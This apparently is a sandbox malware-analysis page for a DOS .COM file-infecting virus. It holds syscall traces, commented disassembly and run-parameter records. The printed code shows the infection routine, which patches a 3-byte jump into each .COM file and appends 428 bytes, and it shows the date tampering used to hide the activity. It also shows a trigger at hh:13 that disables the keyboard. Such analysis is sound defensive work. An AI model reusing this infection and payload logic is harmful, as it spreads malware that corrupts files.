0x12a9c: mov dx, word ptr cs:[di + 0xc]      ; slot written outside this listing; presumably the DTA returned at PC 12a6d
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]      ; reload the saved year
0x12aa6: mov dx, word ptr cs:[di + 0x10]     ; reload the saved month/day
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21                            ; Set date again with the saved values, so the clock looks untouched afterwards
0x12aae: mov bx, 0x100                       ; 0x100 is the offset at which DOS loads a .COM image
0x12ab1: jmp bx                              ; control passes to offset 0x100, presumably the original program, which then appears to run normally
2018-12-25T12:27:06.224745845Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.229260183Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.24143748Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.242966675Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.24990488Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.258727965Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.260075727Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.262966901Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.26581558Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.279928511Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.295516493Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.298894199Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.305876503Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.312429681Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.315052067Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.320447515Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.328054318Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.334940699Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.345907237Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.348729215Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.356925719Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.365952581Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.367742385Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.37102846Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.374002619Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.383353191Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.39386382Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.397102795Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.404448571Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.413318688Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.414787614Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.417623349Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.419950875Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.423475011Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.43127579Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.433994543Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.44244515Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.448979466Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.450557356Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.454940754Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.456591393Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.459402394Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.468481053Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.475069057Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.482249069Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.489539236Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.491495306Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.494456979Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.497213954Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.505423695Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.513466239Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.517134191Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.523796449Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.533700508Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.535783822Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.539415071Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.541319371Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.545815524Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.555121059Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.557688638Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.565551535Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.572246828Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.57383099Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.577116579Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.579271578Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.588536601Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.601133895Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.604423164Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
; Reading note: this listing starts one instruction earlier, with `cmp ch, 0xd` at 0x12b52
; on the "Get time" trace row directly above. DOS Get time (op 44) returns CH = hour and
; CL = minute. The window ends at 0x12b7a; branch targets 0x12b85 and 0x12b9d are not shown.
; NOTE(review): the run parameters on this page (Hour/Min 0/0, 13/0, 13/13) line up with
; this test and were presumably chosen by the sandbox to probe it.
0x12b55: jl 0x12b9d                          ; hour below 13 (signed compare): skip the block
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d                         ; minute not 13: skip; fall-through needs hour >= 13 and minute == 13
0x12b5c: cli                                 ; interrupts masked around the port write
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al                        ; port 0x64 is the keyboard-controller command port and 0xAD its "disable keyboard" command; this direct hardware access does not appear in the DOS syscall trace
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64                        ; short busy-wait, 255 iterations
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl                          ; BL = 0x0F, the palette register to query
0x12b71: int 0x10                            ; video BIOS AX = 1007h: read palette register BL, value returned in BH
0x12b73: cmp bh, 0
0x12b76: je 0x12b85                          ; register already 0: branch to code outside the window
0x12b78: mov ch, 1
0x12b7a: sub bh, 1                           ; value stepped down by one; presumably a screen fade, but the rest is not visible here
2018-12-25T12:27:06.765659499Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.771600192Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.773590127Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.29234589Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.294085872Z 26 PC: 12a7b | Set disk transfer address
2018-12-25T12:27:06.29516975Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx
; Reading note: this listing starts one instruction earlier, at 0x12a7f on the "Get date"
; trace row directly above, where CX is stored to cs:[di + 0xe]. DOS Get date (op 42)
; returns CX = year, DH = month, DL = day, so the two stores keep the real system date.
; The code then shifts the date, runs three routines, and puts the DTA and the date back.
; NOTE(review): files written while the date is shifted would presumably carry the shifted
; date as their modification stamp, a possible forensic marker. Confirm on a sample image.
0x12a83: mov word ptr cs:[di + 0x10], dx    ; keep month/day (DX) beside the saved year
0x12a87: dec cx                              ; year - 1
0x12a88: inc dx                              ; day + 1 (low byte of DX)
0x12a89: mov ah, 0x2b                        ; AH = 2Bh, DOS Set date (op 43 in the trace)
0x12a8b: int 0x21                            ; clock now holds the shifted date; AL (status) is not checked in the visible code
0x12a8d: pop dx                              ; value was pushed before the visible listing; its meaning cannot be determined here
0x12a8e: add dx, 3
0x12a91: call 0x12b1d                        ; trace rows between Set date and Get time fall here: Find first/next, and per .COM file a 3-byte read, a 3-byte write and a 428-byte write
0x12a94: call 0x12b46                        ; trace shows the Get time call (PC 12b52) inside this routine
0x12a97: call 0x12ba9                        ; trace shows a second Find first (PC 12bce) inside this routine
0x12a9a: mov ah, 0x1a                        ; AH = 1Ah, DOS Set disk transfer address
0x12a9c: mov dx, word ptr cs:[di + 0xc]      ; slot written outside this listing; presumably the DTA returned at PC 12a6d
0x12aa0: int 0x21
0x12aa2: mov cx, word ptr cs:[di + 0xe]      ; reload the saved year
0x12aa6: mov dx, word ptr cs:[di + 0x10]     ; reload the saved month/day
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21                            ; Set date again with the saved values, so the clock looks untouched afterwards
0x12aae: mov bx, 0x100                       ; 0x100 is the offset at which DOS loads a .COM image
0x12ab1: jmp bx                              ; control passes to offset 0x100, presumably the original program, which then appears to run normally
2018-12-25T12:27:06.297635131Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.301480864Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.311982114Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.313066649Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.320492759Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.326696854Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.328007389Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.331029841Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.332397375Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.346908017Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.356009633Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.358666368Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.365072951Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.371382576Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.373843929Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.376651347Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.378797032Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.383072674Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.391187975Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.395001217Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.414636398Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.421535434Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.423401941Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.427098237Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.428741183Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.437218938Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.445974307Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.449216097Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.455653232Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.462795966Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.464334248Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.467189281Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.46881887Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.471853043Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.479518509Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.482046904Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.488864847Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.495014448Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.496284881Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.500402485Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.501745258Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.504610712Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.512916622Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.515531492Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.521937533Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.529106243Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.530670957Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.534172061Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.536520359Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.544709134Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.554124917Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.557855811Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.564917855Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.571846618Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.574195206Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.577327097Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.578810499Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.58204513Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.589468539Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.591909281Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.598214757Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.605206098Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.606836228Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.609644633Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.612097349Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.619974308Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.627945225Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.63152469Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd
; Reading note: this listing starts one instruction earlier, with `cmp ch, 0xd` at 0x12b52
; on the "Get time" trace row directly above. DOS Get time (op 44) returns CH = hour and
; CL = minute. The window ends at 0x12b7a; branch targets 0x12b85 and 0x12b9d are not shown.
; NOTE(review): the run parameters on this page (Hour/Min 0/0, 13/0, 13/13) line up with
; this test and were presumably chosen by the sandbox to probe it.
0x12b55: jl 0x12b9d                          ; hour below 13 (signed compare): skip the block
0x12b57: cmp cl, 0xd
0x12b5a: jne 0x12b9d                         ; minute not 13: skip; fall-through needs hour >= 13 and minute == 13
0x12b5c: cli                                 ; interrupts masked around the port write
0x12b5d: mov al, 0xad
0x12b5f: out 0x64, al                        ; port 0x64 is the keyboard-controller command port and 0xAD its "disable keyboard" command; this direct hardware access does not appear in the DOS syscall trace
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64                        ; short busy-wait, 255 iterations
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl                          ; BL = 0x0F, the palette register to query
0x12b71: int 0x10                            ; video BIOS AX = 1007h: read palette register BL, value returned in BH
0x12b73: cmp bh, 0
0x12b76: je 0x12b85                          ; register already 0: branch to code outside the window
0x12b78: mov ch, 1
0x12b7a: sub bh, 1                           ; value stepped down by one; presumably a screen fade, but the rest is not visible here
2018-12-25T12:27:06.633950238Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.640370501Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.642698125Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.49887092Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.50102188Z 26 PC: 12a7b | Set disk transfer address
; Main sequence after the Get date call: save the system date, change it, run
; three routines, then restore the DTA and the date and jump to offset 0x100.
; Annotations assume the standard INT 21h conventions (AH=2Ah returns CX = year,
; DH = month, DL = day; AH=2Bh sets the date from the same registers).
2018-12-25T12:27:06.503222552Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx ; save CX (year) at cs:[di+0xe]
0x12a83: mov word ptr cs:[di + 0x10], dx ; save DX (month/day) at cs:[di+0x10]
0x12a87: dec cx ; year - 1
0x12a88: inc dx ; DL + 1, i.e. day + 1; no range check is visible here
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21 ; INT 21h AH=2Bh Set date with the altered values (logged as "Set date", PC 12a8d); purpose not evident from this excerpt
0x12a8d: pop dx ; value pushed before this excerpt begins
0x12a8e: add dx, 3
0x12a91: call 0x12b1d ; the logged Find first / Find next file calls (PC 12b25, 12b41) lie in this routine's address range
0x12a94: call 0x12b46 ; the logged Get time call (PC 12b52) lies just after this entry
0x12a97: call 0x12ba9 ; the second logged Find first file (PC 12bce) lies just after this entry
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc] ; presumably the DTA address saved after the earlier Get DTA call -- the save is not shown
0x12aa0: int 0x21 ; INT 21h AH=1Ah Set disk transfer address (logged at PC 12aa2)
0x12aa2: mov cx, word ptr cs:[di + 0xe] ; reload the year saved at 0x12a7f
0x12aa6: mov dx, word ptr cs:[di + 0x10] ; reload the month/day saved at 0x12a83
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21 ; Set date again: the system date is put back to the saved value (logged at PC 12aae)
0x12aae: mov bx, 0x100
0x12ab1: jmp bx ; jump to offset 0x100, where the first instruction of a .COM image is loaded
2018-12-25T12:27:06.506683934Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.510802925Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.543868223Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.545852665Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.553691881Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.561695379Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.563856274Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.567263583Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.569485924Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.584802806Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.592641918Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.595536744Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.605130415Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.613937256Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.615950022Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.619649209Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.621401175Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.624556648Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.634619293Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.637777508Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.645191589Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.65278168Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.65517719Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.658323867Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.660957444Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.670206621Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.68021165Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.683154823Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.690644271Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.697909921Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.699399841Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.703981228Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.706328035Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.709929025Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.719921588Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.722859392Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.729923735Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.73781592Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.739325428Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.742183195Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.745265111Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.748528211Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.757208427Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.760859297Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.768215202Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.775394128Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.777748809Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.781267446Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.782787934Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.788981472Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.796852375Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.799459487Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.803805875Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.80882877Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.810125776Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.812602962Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.814423219Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.816464517Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.822973312Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.826270236Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.83217565Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.836906205Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.83849227Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.840713773Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.841900445Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.847846726Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.853908641Z 79 PC: 12b41 | Find next file (See above)
; Time check that follows the Get time call, then the start of the code it guards.
; Annotations assume the standard INT 21h AH=2Ch return convention (CH = hour,
; CL = minute). The listing is a linear dump from the return address; it does
; not show which branch this run actually took. It is cut off after 0x12b7a.
; 0xd = 13: the run-parameter record printed after this trace has Hour 13 / Min 13,
; which would satisfy both comparisons if it describes this run (inferred).
2018-12-25T12:27:06.855769467Z 44 PC: 12b52 | Get time 0x12b52: cmp ch, 0xd ; hour compared with 13 (0xd)
0x12b55: jl 0x12b9d ; hour < 13: skip the guarded code
0x12b57: cmp cl, 0xd ; minute compared with 13
0x12b5a: jne 0x12b9d ; minute != 13: skip; the guarded code runs only at hh:13 with hh >= 13
0x12b5c: cli ; interrupts off around the controller write
0x12b5d: mov al, 0xad ; 0xAD = "disable keyboard interface" command of the 8042 keyboard controller
0x12b5f: out 0x64, al ; port 0x64 = keyboard controller command port; keyboard input stops until re-enabled
0x12b61: mov cx, 0xff
0x12b64: loop 0x12b64 ; busy-wait of 0xff iterations, presumably to let the controller accept the command
0x12b66: sti
0x12b67: mov ch, 0
0x12b69: mov cl, 0xf ; CL = 0x0f, copied to BL below as the palette register number
0x12b6b: mov ah, 0x10
0x12b6d: mov al, 7
0x12b6f: mov bl, cl
0x12b71: int 0x10 ; INT 10h AX=1007h: read one palette register (BL = register, value returned in BH)
0x12b73: cmp bh, 0
0x12b76: je 0x12b85 ; value already 0: branch away
0x12b78: mov ch, 1 ; CH = 1 when the value was non-zero; its later use is outside this excerpt
0x12b7a: sub bh, 1 ; value - 1; looks like one step of a palette fade -- confirm against the full listing
2018-12-25T12:27:06.857593199Z 78 PC: 12bce | Find first file
2018-12-25T12:27:06.86214356Z 26 PC: 12aa2 | Set disk transfer address
2018-12-25T12:27:06.863145458Z 43 PC: 12aae | Set date

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":13,"Min":13,"Second":0,"TimeBased":true,"OriginalID":10051,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:06.497751167Z 47 PC: 12a6d | Get disk transfer address
2018-12-25T12:27:06.500132608Z 26 PC: 12a7b | Set disk transfer address
; Main sequence after the Get date call: save the system date, change it, run
; three routines, then restore the DTA and the date and jump to offset 0x100.
; Annotations assume the standard INT 21h conventions (AH=2Ah returns CX = year,
; DH = month, DL = day; AH=2Bh sets the date from the same registers).
2018-12-25T12:27:06.50116964Z 42 PC: 12a7f | Get date 0x12a7f: mov word ptr cs:[di + 0xe], cx ; save CX (year) at cs:[di+0xe]
0x12a83: mov word ptr cs:[di + 0x10], dx ; save DX (month/day) at cs:[di+0x10]
0x12a87: dec cx ; year - 1
0x12a88: inc dx ; DL + 1, i.e. day + 1; no range check is visible here
0x12a89: mov ah, 0x2b
0x12a8b: int 0x21 ; INT 21h AH=2Bh Set date with the altered values (logged as "Set date", PC 12a8d); purpose not evident from this excerpt
0x12a8d: pop dx ; value pushed before this excerpt begins
0x12a8e: add dx, 3
0x12a91: call 0x12b1d ; the logged Find first / Find next file calls (PC 12b25, 12b41) lie in this routine's address range
0x12a94: call 0x12b46 ; the logged Get time call (PC 12b52) lies just after this entry
0x12a97: call 0x12ba9 ; the second logged Find first file (PC 12bce) lies just after this entry
0x12a9a: mov ah, 0x1a
0x12a9c: mov dx, word ptr cs:[di + 0xc] ; presumably the DTA address saved after the earlier Get DTA call -- the save is not shown
0x12aa0: int 0x21 ; INT 21h AH=1Ah Set disk transfer address (logged at PC 12aa2)
0x12aa2: mov cx, word ptr cs:[di + 0xe] ; reload the year saved at 0x12a7f
0x12aa6: mov dx, word ptr cs:[di + 0x10] ; reload the month/day saved at 0x12a83
0x12aaa: mov ah, 0x2b
0x12aac: int 0x21 ; Set date again: the system date is put back to the saved value (logged at PC 12aae)
0x12aae: mov bx, 0x100
0x12ab1: jmp bx ; jump to offset 0x100, where the first instruction of a .COM image is loaded
2018-12-25T12:27:06.50337485Z 43 PC: 12a8d | Set date
2018-12-25T12:27:06.508229924Z 78 PC: 12b25 | Find first file
2018-12-25T12:27:06.519897018Z 47 PC: 12b2b | Get disk transfer address
2018-12-25T12:27:06.52113103Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:06.527732996Z 63 PC: 12ad8 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:27:06.538427463Z 66 PC: 12af3 | Move file pointer
2018-12-25T12:27:06.539590824Z 64 PC: 12afc | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:27:06.541623769Z 66 PC: 12b08 | Move file pointer
2018-12-25T12:27:06.543441339Z 64 PC: 12b14 | Write file or device (Write 428 bytes on handle 5)
2018-12-25T12:27:06.555018106Z 62 PC: 12b1b | Close file
2018-12-25T12:27:06.577084569Z 79 PC: 12b41 | Find next file
2018-12-25T12:27:06.581118436Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:06.588023562Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T12:27:06.594270957Z 66 PC: 12af3 | Move file pointer (See above)
2018-12-25T12:27:06.595899319Z 64 PC: 12afc | Write file or device (See above)
2018-12-25T12:27:06.598875759Z 66 PC: 12b08 | Move file pointer (See above)
2018-12-25T12:27:06.600502425Z 64 PC: 12b14 | Write file or device (See above)
2018-12-25T12:27:06.60446814Z 62 PC: 12b1b | Close file (See above)
2018-12-25T12:27:06.612472951Z 79 PC: 12b41 | Find next file (See above)
2018-12-25T12:27:06.615336967Z 61 PC: 12aca | Open file (See above)
